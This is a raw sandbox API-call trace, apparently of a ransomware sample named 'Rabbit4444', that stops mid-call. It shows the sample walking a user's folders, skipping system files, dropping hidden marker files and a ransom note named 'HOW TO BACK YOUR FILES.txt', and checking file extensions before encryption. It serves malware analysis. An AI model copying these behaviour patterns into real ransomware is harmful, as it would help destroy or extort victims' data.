1 [0053.801] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer") returned 93 [0053.801] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c61d87, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6cd5b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9622ca9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0053.801] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.801] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.801] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.801] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.801] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c61d87, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6cd5b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9622ca9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.801] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.801] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.801] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.801] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.801] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.801] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9622ca9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9622ca9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9648f67, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.801] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.801] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.801] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6cd5b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6f48d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c6f48d, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aa.online-metrix.net", cAlternateFileName="AAONLI~1.NET")) returned 1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="Rabbit4444.exe") returned -1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2=".") returned 1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="..") returned 1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="windows") returned -1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="bootmgr") returned -1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="pagefile.sys") returned -1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="boot") returned -1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="ids.txt") returned -1 [0053.801] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="NTUSER.DAT") returned -1 [0053.802] lstrcpyW (in: lpString1=0x130ebf4, lpString2="aa.online-metrix.net" | out: lpString1="aa.online-metrix.net") returned="aa.online-metrix.net" [0053.802] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.802] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xe6) returned 0x116fb8 [0053.802] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0053.802] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6cd5b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6f48d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c6f48d, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aa.online-metrix.net", cAlternateFileName="AAONLI~1.NET")) returned 0 [0053.802] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0053.802] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.802] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.803] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.803] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.804] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.804] CloseHandle (hObject=0x278) returned 1 [0053.804] CloseHandle (hObject=0x27c) returned 1 [0053.804] GetCurrentThreadId () returned 0xd98 [0053.804] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.804] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net" [0053.804] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116fb8 | out: hHeap=0xe0000) returned 1 [0053.804] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.804] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net" [0053.804] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\" [0053.804] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\.BFC0E91B00AE8A0620D3" [0053.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.808] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.810] FlushFileBuffers (hFile=0x27c) returned 1 [0053.811] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.811] CloseHandle (hObject=0x27c) returned 1 [0053.812] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net") returned 114 [0053.812] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.812] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6cd5b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6f48d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9648f67, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0053.812] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.812] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.812] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.812] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.812] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6cd5b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6f48d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9648f67, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.812] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.812] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.812] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.812] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.812] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.812] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9648f67, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9648f67, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9648f67, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.812] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.812] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.812] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6f48d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c903f8, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c903f8, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fpc.swf", cAlternateFileName="")) returned 1 [0053.812] lstrcmpiW (lpString1="fpc.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.812] lstrcmpiW (lpString1="fpc.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.813] lstrcmpiW (lpString1="fpc.swf", lpString2="Rabbit4444.exe") returned -1 [0053.813] lstrcmpiW (lpString1="fpc.swf", lpString2=".") returned 1 [0053.813] lstrcmpiW (lpString1="fpc.swf", lpString2="..") returned 1 [0053.813] lstrcmpiW (lpString1="fpc.swf", lpString2="windows") returned -1 [0053.813] lstrcmpiW (lpString1="fpc.swf", lpString2="bootmgr") returned 1 [0053.813] lstrcmpiW (lpString1="fpc.swf", lpString2="pagefile.sys") returned -1 [0053.813] lstrcmpiW (lpString1="fpc.swf", lpString2="boot") returned 1 [0053.813] lstrcmpiW (lpString1="fpc.swf", lpString2="ids.txt") returned -1 [0053.813] lstrcmpiW (lpString1="fpc.swf", lpString2="NTUSER.DAT") returned -1 [0053.813] lstrcpyW (in: lpString1=0x130ec1e, lpString2="fpc.swf" | out: lpString1="fpc.swf") returned="fpc.swf" [0053.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xf6) returned 0xf12e0 [0053.813] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0053.813] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6f48d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c903f8, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c903f8, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fpc.swf", cAlternateFileName="")) returned 0 [0053.813] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0053.813] lstrcpyW (in: lpString1=0x130ec1e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.813] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.815] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.815] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.816] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.816] CloseHandle (hObject=0x278) returned 1 [0053.816] CloseHandle (hObject=0x27c) returned 1 [0053.816] GetCurrentThreadId () returned 0xd98 [0053.816] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.816] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf" [0053.816] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.816] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.816] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf" [0053.816] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\" [0053.816] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\.BFC0E91B00AE8A0620D3" [0053.816] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.817] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.820] FlushFileBuffers (hFile=0x27c) returned 1 [0053.821] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.821] CloseHandle (hObject=0x27c) returned 1 [0053.821] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf") returned 122 [0053.821] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.821] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6f48d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c903f8, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe966f106, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0053.821] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.821] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.822] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.822] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.822] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6f48d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c903f8, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe966f106, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.822] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.822] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.822] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.822] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.822] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.822] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe966f106, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe966f106, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe966f106, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.822] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.822] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.822] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c75633, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c75633, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c85414, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="session.sol", cAlternateFileName="")) returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2="Rabbit4444.exe") returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2=".") returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2="..") returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2="windows") returned -1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2="bootmgr") returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2="pagefile.sys") returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2="boot") returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2="ids.txt") returned 1 [0053.822] lstrcmpiW (lpString1="session.sol", lpString2="NTUSER.DAT") returned 1 [0053.822] lstrcpyW (in: lpString1=0x130ec2e, lpString2="session.sol" | out: lpString1="session.sol") returned="session.sol" [0053.822] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\session.sol", dwFileAttributes=0x0) returned 1 [0053.823] lstrlenW (lpString="session.sol") returned 11 [0053.823] lstrlenW (lpString="Rabbit4444") returned 10 [0053.823] lstrcmpiW (lpString1="ession.sol", lpString2="Rabbit4444") returned -1 [0053.823] lstrlenW (lpString=".dll") returned 4 [0053.823] lstrcmpiW (lpString1=".sol", lpString2=".dll") returned 1 [0053.823] lstrlenW (lpString=".lnk") returned 4 [0053.823] lstrcmpiW (lpString1=".sol", lpString2=".lnk") returned 1 [0053.823] lstrlenW (lpString=".ini") returned 4 [0053.823] lstrcmpiW (lpString1=".sol", lpString2=".ini") returned 1 [0053.823] lstrlenW (lpString=".sys") returned 4 [0053.823] lstrcmpiW (lpString1=".sol", lpString2=".sys") returned -1 [0053.823] CreateFileW 